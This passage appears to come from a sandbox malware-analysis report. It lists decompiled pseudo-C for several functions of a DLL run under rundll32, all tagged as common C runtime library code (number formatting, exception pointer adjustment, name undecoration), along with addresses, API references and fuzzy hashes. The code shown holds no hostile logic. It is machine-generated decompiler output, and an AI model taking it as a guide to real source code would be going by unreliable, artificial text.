				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				signed int _t117;
				signed int* _t118;
				void* _t121;
				signed int _t123;
				signed int _t129;
				signed int* _t130;
				signed int* _t133;
				signed int _t134;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				void* _t154;
				unsigned int _t155;
				signed int _t162;
				void* _t163;
				signed int _t164;
				signed int* _t165;
				signed int _t168;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t181;

				_t163 = __edx;
				_t173 = _a24;
				if(_t173 < 0) {
					_t173 = 0;
				}
				_t177 = _a8;
				 *_t177 = 0;
				E1000F794( &_v60, _t163, _a36);
				_t5 = _t173 + 0xb; // 0xb
				_t185 = _a12 - _t5;
				if(_a12 > _t5) {
					_t133 = _a4;
					_t139 = _t133[1];
					_t164 =  *_t133;
					__eflags = (_t139 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t139 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t139;
						if(__eflags > 0) {
							L14:
							_t18 = _t177 + 1; // 0x2
							_t165 = _t18;
							_t85 = _a28 ^ 0x00000001;
							_v16 = 0x3ff;
							_v5 = _t85;
							_v40 = _t165;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t139 & 0x7ff00000;
							_t91 = 0x30;
							if((_t139 & 0x7ff00000) != 0) {
								 *_t177 = 0x31;
								L19:
								_t141 = 0;
								__eflags = 0;
								L20:
								_t26 =  &(_t165[0]); // 0x2
								_t178 = _t26;
								_v12 = _t178;
								__eflags = _t173;
								if(_t173 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t141;
								}
								 *_t165 = _t95;
								_t97 = _t133[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t166 = _t141;
									_t142 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v20 = _t141;
									_v24 = 0xf0000;
									do {
										__eflags = _t173;
										if(_t173 <= 0) {
											break;
										}
										_t121 = E1003F990( *_t133 & _t166, _v12, _t133[1] & _t142 & 0x000fffff);
										_t154 = 0x30;
										_t123 = _t121 + _t154 & 0x0000ffff;
										__eflags = _t123 - 0x39;
										if(_t123 > 0x39) {
											_t123 = _t123 + _v32;
											__eflags = _t123;
										}
										_t155 = _v24;
										_t166 = (_t155 << 0x00000020 | _v20) >> 4;
										 *_t178 = _t123;
										_t178 = _t178 + 1;
										_t142 = _t155 >> 4;
										_t98 = _v12 - 4;
										_t173 = _t173 - 1;
										_v20 = (_t155 << 0x00000020 | _v20) >> 4;
										_v24 = _t155 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v12 = _t178;
									__eflags = _t98;
									if(__eflags < 0) {
										goto L42;
									}
									_t117 = E1002DB0D(__eflags, _t133, _t166, _t142, _t98, _a40);
									_t181 = _t181 + 0x14;
									__eflags = _t117;
									if(_t117 == 0) {
										goto L42;
									}
									_t50 = _t178 - 1; // 0x2
									_t118 = _t50;
									_t137 = 0x30;
									while(1) {
										_t149 =  *_t118;
										__eflags = _t149 - 0x66;
										if(_t149 == 0x66) {
											goto L35;
										}
										__eflags = _t149 - 0x46;
										if(_t149 != 0x46) {
											_t133 = _a4;
											__eflags = _t118 - _v40;
											if(_t118 == _v40) {
												_t54 = _t118 - 1;
												 *_t54 =  *(_t118 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t149 - 0x39;
												if(_t149 != 0x39) {
													_t150 = _t149 + 1;
													__eflags = _t150;
												} else {
													_t150 = _v32 + 0x3a;
												}
												 *_t118 = _t150;
											}
											goto L42;
										}
										L35:
										 *_t118 = _t137;
										_t118 = _t118 - 1;
									}
								} else {
									__eflags =  *_t133 - _t141;
									if( *_t133 <= _t141) {
										L42:
										__eflags = _t173;
										if(_t173 > 0) {
											_push(_t173);
											_t115 = 0x30;
											_push(_t115);
											_push(_t178);
											E100050F0(_t173);
											_t178 = _t178 + _t173;
											__eflags = _t178;
											_v12 = _t178;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t178 = _t99;
											_v12 = _t178;
										}
										 *_t178 = (_v5 << 5) + 0x50;
										_t104 = E1003F990( *_t133, 0x34, _t133[1]);
										_t179 = 0;
										_t105 = _v12;
										_t146 = (_t104 & 0x000007ff) - _v16;
										__eflags = _t146;
										asm("sbb esi, esi");
										_t63 = _t105 + 2; // 0x12
										_t168 = _t63;
										_v40 = _t168;
										if(__eflags < 0) {
											L50:
											_t146 =  ~_t146;
											asm("adc esi, 0x0");
											_t179 =  ~_t179;
											_t134 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t134 = 0x2b;
												L51:
												 *(_t105 + 1) = _t134;
												_t174 = _t168;
												_t106 = 0x30;
												 *_t168 = _t106;
												_t107 = 0;
												__eflags = _t179;
												if(__eflags < 0) {
													L55:
													__eflags = _t174 - _t168;
													if(_t174 != _t168) {
														L59:
														_push(_t134);
														_push(_t107);
														_push(0x64);
														_push(_t179);
														_t108 = E1003F890();
														_t179 = _t134;
														_t134 = _t146;
														_v32 = _t168;
														_t168 = _v40;
														 *_t174 = _t108 + 0x30;
														_t174 = _t174 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t174 - _t168;
														if(_t174 != _t168) {
															L64:
															_push(_t134);
															_push(_t107);
															_push(0xa);
															_push(_t179);
															_push(_t146);
															_t110 = E1003F890();
															_v40 = _t168;
															 *_t174 = _t110 + 0x30;
															_t174 = _t174 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t147 = _t146 + 0x30;
															__eflags = _t147;
															 *_t174 = _t147;
															 *(_t174 + 1) = _t107;
															_t175 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t175;
														}
														__eflags = _t179 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t146 - 0xa;
														if(_t146 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t179 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t146 - 0x64;
													if(_t146 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t134 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t134);
													_push(_t107);
													_push(_t134);
													_push(_t179);
													_t113 = E1003F890();
													_t179 = _t134;
													_t134 = _t146;
													_v32 = _t168;
													_t168 = _v40;
													 *_t168 = _t113 + 0x30;
													_t68 = _t168 + 1; // 0x2
													_t174 = _t68;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t146 - 0x3e8;
												if(_t146 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t146;
											if(_t146 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t177 = _t91;
							_t141 =  *_t133 | _t133[1] & 0x000fffff;
							__eflags = _t141;
							if(_t141 != 0) {
								_v16 = 0x3fe;
								goto L19;
							}
							_v16 = _t141;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t177 = 0x2d;
							_t177 = _t177 + 1;
							__eflags = _t177;
							_t139 = _t133[1];
							goto L14;
						}
						__eflags = _t164;
						if(_t164 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t175 = E1002D602(_t133, _t139, _t164, _t133, _t177, _a12, _a16, _a20, _t173, 0, _a32, 0, _a40);
					__eflags = _t175;
					if(_t175 == 0) {
						_t129 = E10041D10(_t177, 0x65);
						__eflags = _t129;
						if(_t129 != 0) {
							_t162 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t162;
							 *_t129 = _t162;
							 *((char*)(_t129 + 3)) = 0;
						}
						_t175 = 0;
					} else {
						 *_t177 = 0;
					}
					goto L66;
				}
				_t130 = E1002449E(_t185);
				_t175 = 0x22;
				 *_t130 = _t175;
				E1000E314();
				goto L66;
			}

0x1002d2f3
0x1002d2fe
0x1002d303
0x1002d305
0x1002d305
0x1002d309
0x1002d312
0x1002d314
0x1002d319
0x1002d31c
0x1002d31f
0x1002d335
0x1002d338
0x1002d33d
0x1002d347
0x1002d34c
0x1002d3a3
0x1002d3a5
0x1002d3b4
0x1002d3b7
0x1002d3b7
0x1002d3ba
0x1002d3bc
0x1002d3c3
0x1002d3d5
0x1002d3d8
0x1002d3dd
0x1002d3e1
0x1002d3e2
0x1002d402
0x1002d405
0x1002d405
0x1002d405
0x1002d407
0x1002d407
0x1002d407
0x1002d40a
0x1002d40d
0x1002d40f
0x1002d420
0x1002d411
0x1002d411
0x1002d411
0x1002d422
0x1002d427
0x1002d427
0x1002d42c
0x1002d42f
0x1002d439
0x1002d43b
0x1002d43d
0x1002d442
0x1002d443
0x1002d446
0x1002d449
0x1002d44c
0x1002d44c
0x1002d44e
0x00000000
0x00000000
0x1002d465
0x1002d46c
0x1002d470
0x1002d473
0x1002d476
0x1002d478
0x1002d478
0x1002d478
0x1002d47e
0x1002d481
0x1002d485
0x1002d487
0x1002d48b
0x1002d48e
0x1002d491
0x1002d492
0x1002d495
0x1002d498
0x1002d49b
0x1002d49b
0x1002d4a0
0x1002d4a3
0x1002d4a6
0x00000000
0x00000000
0x1002d4af
0x1002d4b4
0x1002d4b7
0x1002d4b9
0x00000000
0x00000000
0x1002d4bd
0x1002d4bd
0x1002d4c0
0x1002d4c1
0x1002d4c1
0x1002d4c3
0x1002d4c6
0x00000000
0x00000000
0x1002d4c8
0x1002d4cb
0x1002d4d2
0x1002d4d5
0x1002d4d8
0x1002d4ed
0x1002d4ed
0x1002d4ed
0x1002d4da
0x1002d4da
0x1002d4dd
0x1002d4e7
0x1002d4e7
0x1002d4df
0x1002d4e2
0x1002d4e2
0x1002d4e9
0x1002d4e9
0x00000000
0x1002d4d8
0x1002d4cd
0x1002d4cd
0x1002d4cf
0x1002d4cf
0x1002d431
0x1002d431
0x1002d433
0x1002d4f0
0x1002d4f0
0x1002d4f2
0x1002d4f4
0x1002d4f7
0x1002d4f8
0x1002d4f9
0x1002d4fa
0x1002d502
0x1002d502
0x1002d504
0x1002d504
0x1002d507
0x1002d50a
0x1002d50d
0x1002d50f
0x1002d511
0x1002d511
0x1002d51e
0x1002d525
0x1002d52c
0x1002d52e
0x1002d537
0x1002d537
0x1002d53a
0x1002d53c
0x1002d53c
0x1002d53f
0x1002d542
0x1002d54e
0x1002d54e
0x1002d552
0x1002d555
0x1002d557
0x00000000
0x1002d544
0x1002d544
0x1002d54a
0x1002d54a
0x1002d558
0x1002d558
0x1002d55b
0x1002d55f
0x1002d560
0x1002d562
0x1002d564
0x1002d566
0x1002d590
0x1002d590
0x1002d592
0x1002d59f
0x1002d59f
0x1002d5a0
0x1002d5a1
0x1002d5a3
0x1002d5a5
0x1002d5aa
0x1002d5ac
0x1002d5b0
0x1002d5b3
0x1002d5b6
0x1002d5b8
0x1002d5b9
0x1002d5b9
0x1002d5bb
0x1002d5bb
0x1002d5bd
0x1002d5ca
0x1002d5ca
0x1002d5cb
0x1002d5cc
0x1002d5ce
0x1002d5cf
0x1002d5d0
0x1002d5d9
0x1002d5dc
0x1002d5de
0x1002d5df
0x1002d5df
0x1002d5e1
0x1002d5e1
0x1002d5e1
0x1002d5e4
0x1002d5e6
0x1002d5e9
0x1002d5eb
0x1002d5f1
0x1002d5f6
0x1002d5f6
0x1002d601
0x1002d601
0x1002d5bf
0x1002d5c1
0x00000000
0x00000000
0x1002d5c3
0x00000000
0x00000000
0x1002d5c5
0x1002d5c8
0x00000000
0x00000000
0x00000000
0x1002d5c8
0x1002d594
0x1002d596
0x00000000
0x00000000
0x1002d598
0x00000000
0x00000000
0x1002d59a
0x1002d59d
0x00000000
0x00000000
0x00000000
0x1002d59d
0x1002d568
0x1002d56d
0x1002d573
0x1002d573
0x1002d574
0x1002d575
0x1002d576
0x1002d578
0x1002d57d
0x1002d57f
0x1002d581
0x1002d586
0x1002d589
0x1002d58b
0x1002d58b
0x1002d58e
0x1002d58e
0x00000000
0x1002d58e
0x1002d56f
0x1002d571
0x00000000
0x00000000
0x00000000
0x1002d571
0x1002d546
0x1002d548
0x00000000
0x00000000
0x00000000
0x1002d548
0x1002d542
0x00000000
0x1002d433
0x1002d42f
0x1002d3e4
0x1002d3f0
0x1002d3f0
0x1002d3f2
0x1002d3f9
0x00000000
0x1002d3f9
0x1002d3f4
0x00000000
0x1002d3f4
0x1002d3a7
0x1002d3ad
0x1002d3ad
0x1002d3b0
0x1002d3b0
0x1002d3b1
0x00000000
0x1002d3b1
0x1002d3a9
0x1002d3ab
0x00000000
0x00000000
0x00000000
0x1002d3ab
0x1002d369
0x1002d36e
0x1002d370
0x1002d37d
0x1002d384
0x1002d386
0x1002d391
0x1002d391
0x1002d394
0x1002d396
0x1002d396
0x1002d39a
0x1002d372
0x1002d372
0x1002d372
0x00000000
0x1002d370
0x1002d321
0x1002d328
0x1002d329
0x1002d32b
0x00000000

APIs

_strrchr.LIBCMT ref: 1002D37D

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 6e08ab9a1fa69a4118e9f31670c8a60bf4d3ea2fa92c3c91dc5dc3b4aa9ad292
Instruction ID: 60edc47403ceb57e4c32773f528f628eab84e72a7bd41eb7e043d998d246c257
Opcode Fuzzy Hash: 6e08ab9a1fa69a4118e9f31670c8a60bf4d3ea2fa92c3c91dc5dc3b4aa9ad292
Instruction Fuzzy Hash: 68B19B719006969FDB01EF28D881BEEBBF5EF45344F6140ABE844DB241D674AE01CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10005B62, Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E10005B62() {
				signed char* _t52;
				signed int _t53;
				intOrPtr _t54;
				void* _t58;
				void* _t61;
				intOrPtr _t71;
				signed int _t74;
				signed int _t78;
				signed char _t80;
				signed char _t83;
				signed char* _t84;
				signed char _t96;
				signed char* _t97;
				signed char* _t99;
				signed char* _t104;
				void* _t108;

				_push(0x10);
				_push(0x1004b018);
				E100040F0();
				_t74 = 0;
				_t52 =  *(_t108 + 0x10);
				_t80 = _t52[4];
				if(_t80 == 0 ||  *((intOrPtr*)(_t80 + 8)) == 0) {
					L30:
					_t53 = 0;
					goto L31;
				} else {
					_t96 = _t52[8];
					if(_t96 != 0 ||  *_t52 < 0) {
						_t83 =  *_t52;
						_t104 =  *(_t108 + 0xc);
						if(_t83 >= 0) {
							_t104 =  &(( &(_t104[0xc]))[_t96]);
						}
						 *(_t108 - 4) = _t74;
						_t99 =  *(_t108 + 0x14);
						if(_t83 >= 0 || ( *_t99 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t108 + 8));
							if((_t83 & 0x00000008) == 0) {
								if(( *_t99 & 0x00000001) == 0) {
									_t83 =  *(_t54 + 0x18);
									if(_t99[0x18] != _t74) {
										if(_t83 == 0 || _t104 == 0) {
											goto L32;
										} else {
											_t78 = 0;
											_t74 = (_t78 & 0xffffff00 | ( *_t99 & 0x00000004) != 0x00000000) + 1;
											 *(_t108 - 0x20) = _t74;
											goto L29;
										}
									} else {
										if(_t83 == 0 || _t104 == 0) {
											goto L32;
										} else {
											E1000D9E0(_t104, E1000558B(_t83,  &(_t99[8])), _t99[0x14]);
											goto L29;
										}
									}
								} else {
									if( *(_t54 + 0x18) == 0 || _t104 == 0) {
										goto L32;
									} else {
										E1000D9E0(_t104,  *(_t54 + 0x18), _t99[0x14]);
										if(_t99[0x14] == 4 &&  *_t104 != 0) {
											_push( &(_t99[8]));
											_push( *_t104);
											goto L21;
										}
										goto L29;
									}
								}
							} else {
								_t83 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x1004dfb0; // 0x0
							 *((intOrPtr*)(_t108 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x1004223c();
								_t83 =  *((intOrPtr*)(_t108 - 0x1c))();
								L12:
								if(_t83 == 0 || _t104 == 0) {
									L32:
									E10012120(_t74, _t83, _t96, _t104);
									asm("int3");
									_push(8);
									_push(0x1004b038);
									E100040F0();
									_t97 =  *(_t108 + 0x10);
									_t84 =  *(_t108 + 0xc);
									if( *_t97 >= 0) {
										_t101 =  &(( &(_t84[0xc]))[_t97[8]]);
									} else {
										_t101 = _t84;
									}
									 *(_t108 - 4) =  *(_t108 - 4) & 0x00000000;
									_t105 =  *(_t108 + 0x14);
									_push( *(_t108 + 0x14));
									_push(_t97);
									_push(_t84);
									_t76 =  *((intOrPtr*)(_t108 + 8));
									_push( *((intOrPtr*)(_t108 + 8)));
									_t58 = E10005B62() - 1;
									if(_t58 == 0) {
										_t61 = E100069CC(_t101, _t105[0x18], E1000558B( *((intOrPtr*)(_t76 + 0x18)),  &(_t105[8])));
									} else {
										_t61 = _t58 - 1;
										if(_t61 == 0) {
											_t61 = E100069DC(_t101, _t105[0x18], E1000558B( *((intOrPtr*)(_t76 + 0x18)),  &(_t105[8])), 1);
										}
									}
									 *(_t108 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0x10));
									return _t61;
								} else {
									 *_t104 = _t83;
									_push( &(_t99[8]));
									_push(_t83);
									L21:
									 *_t104 = E1000558B();
									L29:
									 *(_t108 - 4) = 0xfffffffe;
									_t53 = _t74;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x10005b62
0x10005b64
0x10005b69
0x10005b6e
0x10005b70
0x10005b73
0x10005b78
0x10005c88
0x10005c88
0x00000000
0x10005b87
0x10005b87
0x10005b8c
0x10005b96
0x10005b98
0x10005b9d
0x10005ba2
0x10005ba2
0x10005ba4
0x10005ba7
0x10005bac
0x10005bce
0x10005bce
0x10005bd4
0x10005bf5
0x10005c34
0x10005c3a
0x10005c61
0x00000000
0x10005c67
0x10005c6c
0x10005c70
0x10005c71
0x00000000
0x10005c71
0x10005c3c
0x10005c3e
0x00000000
0x10005c44
0x10005c55
0x00000000
0x10005c5a
0x10005c3e
0x10005bf7
0x10005bfb
0x00000000
0x10005c09
0x10005c10
0x10005c1c
0x10005c26
0x10005c27
0x00000000
0x10005c27
0x00000000
0x10005c1c
0x10005bfb
0x10005bd6
0x10005bd6
0x00000000
0x10005bd6
0x10005bb3
0x10005bb3
0x10005bb8
0x10005bbd
0x00000000
0x10005bbf
0x10005bc1
0x10005bca
0x10005bd9
0x10005bdb
0x10005c9a
0x10005c9a
0x10005c9f
0x10005ca0
0x10005ca2
0x10005ca7
0x10005cac
0x10005caf
0x10005cb5
0x10005cbe
0x10005cb7
0x10005cb7
0x10005cb7
0x10005cc1
0x10005cc5
0x10005cc8
0x10005cc9
0x10005cca
0x10005ccb
0x10005cce
0x10005cd7
0x10005cda
0x10005d10
0x10005cdc
0x10005cdc
0x10005cdf
0x10005cf6
0x10005cf6
0x10005cdf
0x10005d15
0x10005d1f
0x10005d2b
0x10005be9
0x10005be9
0x10005bee
0x10005bef
0x10005c29
0x10005c30
0x10005c74
0x10005c74
0x10005c7b
0x10005c8a
0x10005c8d
0x10005c99
0x10005c99
0x10005bdb
0x10005bbd
0x00000000
0x00000000
0x00000000
0x10005b8c

APIs

___AdjustPointer.LIBCMT ref: 10005C29
___AdjustPointer.LIBCMT ref: 10005C4C
___AdjustPointer.LIBCMT ref: 10005CE8

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 0a6d94b4c3479a4b0be2b1027ae3d127e2d81f876ae5e55fb9d0f4828f490593
Instruction ID: 31fa209adb8231de4210eaca4de771a1eb96de73e4b0f2c6b5dc5ef330e7e6b6
Opcode Fuzzy Hash: 0a6d94b4c3479a4b0be2b1027ae3d127e2d81f876ae5e55fb9d0f4828f490593
Instruction Fuzzy Hash: E351C075600706AFFB29CF10D881FAB77A4EF443D2F204529EC0596699EB32ED40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000B1EA, Relevance: 6.2, APIs: 4, Instructions: 165
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E1000B1EA(void* __ebx, signed int* _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				char* _v20;
				void* __esi;
				char _t54;
				void* _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t69;
				intOrPtr* _t71;
				signed int _t72;
				intOrPtr* _t74;
				signed int _t82;
				signed int _t83;
				signed int _t86;
				void* _t95;
				char* _t101;
				char* _t102;
				char* _t107;
				signed int* _t109;

				_t100 = __ebx;
				_t101 =  *0x1004e004; // 0x0
				_v12 = 0;
				_v8 = 0;
				_t54 =  *_t101;
				if(_t54 == 0) {
					L15:
					E10007662(_t101, _a4, 1, _a8);
					L16:
					L17:
					return _a4;
				}
				_t57 = _t54 - 0x24;
				if(_t57 == 0) {
					_t58 =  *((intOrPtr*)(_t101 + 1));
					__eflags = _t58 - 0x24;
					if(_t58 == 0x24) {
						_t109 = _a8;
						_t101 = _t101 + 2;
						 *0x1004e004 = _t101;
						_t59 =  *_t101;
						__eflags = _t59 - 0x51;
						if(__eflags > 0) {
							_t60 = _t59 - 0x52;
							__eflags = _t60;
							if(_t60 == 0) {
								_t102 =  &_v12;
								_push( &_v20);
								__eflags =  *_t109;
								if( *_t109 == 0) {
									_v20 = "volatile";
									_v16 = 8;
								} else {
									_v20 = "volatile ";
									_v16 = 9;
								}
								E10007500(_t102);
								_t101 =  *0x1004e004; // 0x0
								L42:
								_push(3);
								L12:
								_v20 =  *_t109;
								 *0x1004e004 = _t101 + 1;
								_v16 =  *(_t109 + 4) | 0x00000100;
								_push( &_v20);
								_push( &_v12);
								_push(_a4);
								E1000B576(_t100);
								goto L17;
							}
							_t69 = _t60 - 1;
							__eflags = _t69;
							if(_t69 == 0) {
								_t43 = _t101 + 1; // -1
								 *0x1004e004 = _t43;
								L37:
								_t71 = _a4;
								 *((intOrPtr*)(_t71 + 4)) = 0;
								 *((char*)(_t71 + 4)) = 2;
								 *_t71 = 0;
								return _t71;
							}
							_t72 = _t69 - 1;
							__eflags = _t72;
							if(_t72 == 0) {
								_t34 = _t101 + 1; // -1
								 *0x1004e004 = _t34;
								_t74 = _t109;
								__eflags =  *_t74;
								if( *_t74 == 0) {
									_v20 = "std::nullptr_t";
									_v16 = 0xe;
									E1000723E(_a4,  &_v20);
									goto L17;
								}
								_v20 = "std::nullptr_t ";
								_v16 = 0xf;
								E10007615(_t101, _a4,  &_v20, _t74);
								goto L16;
							}
							__eflags = _t72 - 5;
							if(__eflags != 0) {
								goto L37;
							}
							_t33 = _t101 + 1; // -1
							 *0x1004e004 = _t33;
							E1000BBAD(0, __eflags, _a4);
							L6:
							goto L17;
						}
						if(__eflags == 0) {
							goto L42;
						}
						_t82 = _t59;
						__eflags = _t82;
						if(_t82 == 0) {
							goto L15;
						}
						_t83 = _t82 - 0x41;
						__eflags = _t83;
						if(_t83 == 0) {
							_t31 = _t101 + 1; // -1
							 *0x1004e004 = _t31;
							E1000A54C(_a4, _t109);
							L5:
							goto L6;
						}
						_t86 = _t83 - 1;
						__eflags = _t86;
						if(_t86 == 0) {
							_t29 = _t101 + 1; // -1
							 *0x1004e004 = _t29;
							E1000B409(__ebx, _t109, _a4, _t109, 1);
							goto L16;
						}
						__eflags = _t86 != 1;
						if(_t86 != 1) {
							goto L37;
						}
						_t22 = _t101 + 1; // -1
						_v20 = 0;
						 *0x1004e004 = _t22;
						_v16 = 0;
						E10008D42(_a4, E10009403(_t101,  &_v12, _t109, 0,  &_v20, 0));
						goto L17;
					}
					__eflags = _t58;
					if(_t58 != 0) {
						goto L37;
					}
					goto L15;
				}
				_t109 = _a8;
				_t95 = _t57 - 0x1d;
				if(_t95 == 0) {
					L11:
					_push(2);
					goto L12;
				}
				if(_t95 == 1) {
					_t107 =  &_v12;
					_push( &_v20);
					__eflags =  *_t109;
					if( *_t109 == 0) {
						_v20 = "volatile";
						_v16 = 8;
					} else {
						_v20 = "volatile ";
						_v16 = 9;
					}
					E10007500(_t107);
					_t101 =  *0x1004e004; // 0x0
					goto L11;
				}
				E10008D42(_a4, _t109);
				goto L5;
			}

0x1000b1ea
0x1000b1f0
0x1000b1f9
0x1000b1fc
0x1000b202
0x1000b204
0x1000b29d
0x1000b2a5
0x1000b2aa
0x1000b2ad
0x00000000
0x1000b2ad
0x1000b20a
0x1000b20d
0x1000b28e
0x1000b291
0x1000b293
0x1000b2b3
0x1000b2b6
0x1000b2b9
0x1000b2bf
0x1000b2c2
0x1000b2c5
0x1000b33b
0x1000b33b
0x1000b33e
0x1000b3d1
0x1000b3d4
0x1000b3d5
0x1000b3d7
0x1000b3e9
0x1000b3f0
0x1000b3d9
0x1000b3d9
0x1000b3e0
0x1000b3e0
0x1000b3f7
0x1000b3fc
0x1000b402
0x1000b402
0x1000b262
0x1000b265
0x1000b270
0x1000b276
0x1000b27c
0x1000b280
0x1000b281
0x1000b284
0x00000000
0x1000b289
0x1000b344
0x1000b344
0x1000b347
0x1000b3b5
0x1000b3b8
0x1000b3bd
0x1000b3bd
0x1000b3c0
0x1000b3c3
0x1000b3c7
0x00000000
0x1000b3c7
0x1000b349
0x1000b349
0x1000b34c
0x1000b368
0x1000b36b
0x1000b370
0x1000b372
0x1000b374
0x1000b39d
0x1000b3a4
0x1000b3ab
0x00000000
0x1000b3ab
0x1000b37a
0x1000b385
0x1000b38c
0x00000000
0x1000b38c
0x1000b34e
0x1000b351
0x00000000
0x00000000
0x1000b356
0x1000b359
0x1000b35e
0x1000b226
0x00000000
0x1000b226
0x1000b2c7
0x00000000
0x00000000
0x1000b2cd
0x1000b2cd
0x1000b2cf
0x00000000
0x00000000
0x1000b2d1
0x1000b2d1
0x1000b2d4
0x1000b329
0x1000b32c
0x1000b331
0x1000b225
0x00000000
0x1000b225
0x1000b2d6
0x1000b2d6
0x1000b2d9
0x1000b316
0x1000b319
0x1000b31e
0x00000000
0x1000b31e
0x1000b2db
0x1000b2de
0x00000000
0x00000000
0x1000b2e4
0x1000b2e7
0x1000b2eb
0x1000b2f8
0x1000b306
0x00000000
0x1000b30b
0x1000b295
0x1000b297
0x00000000
0x00000000
0x00000000
0x1000b297
0x1000b20f
0x1000b212
0x1000b215
0x1000b260
0x1000b260
0x00000000
0x1000b260
0x1000b21a
0x1000b22f
0x1000b232
0x1000b233
0x1000b235
0x1000b247
0x1000b24e
0x1000b237
0x1000b237
0x1000b23e
0x1000b23e
0x1000b255
0x1000b25a
0x00000000
0x1000b25a
0x1000b220
0x00000000

APIs

shared_ptr.LIBCMT ref: 1000B255
operator+.LIBVCRUNTIME ref: 1000B2A5
operator+.LIBVCRUNTIME ref: 1000B38C
shared_ptr.LIBCMT ref: 1000B3F7

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: operator+shared_ptr
String ID:
API String ID: 864562889-0
Opcode ID: e6218108176b14940d3872b46b66bed8babf2f70d609e583f29d53091d4cb5cb
Instruction ID: 93e7bdd40a4f091c83d39b0a35ead360230e477b65409987ed75284ff6752577
Opcode Fuzzy Hash: e6218108176b14940d3872b46b66bed8babf2f70d609e583f29d53091d4cb5cb
Instruction Fuzzy Hash: F8517D7180495AEFEB00CFA8C945AAE7BF4FB053C0F20856AE81997219D776DB41CB45

Uniqueness

Uniqueness Score: -1.00%

Function 1000A248, Relevance: 6.1, APIs: 4, Instructions: 144
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000A248(signed int* _a4, intOrPtr* _a8, char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
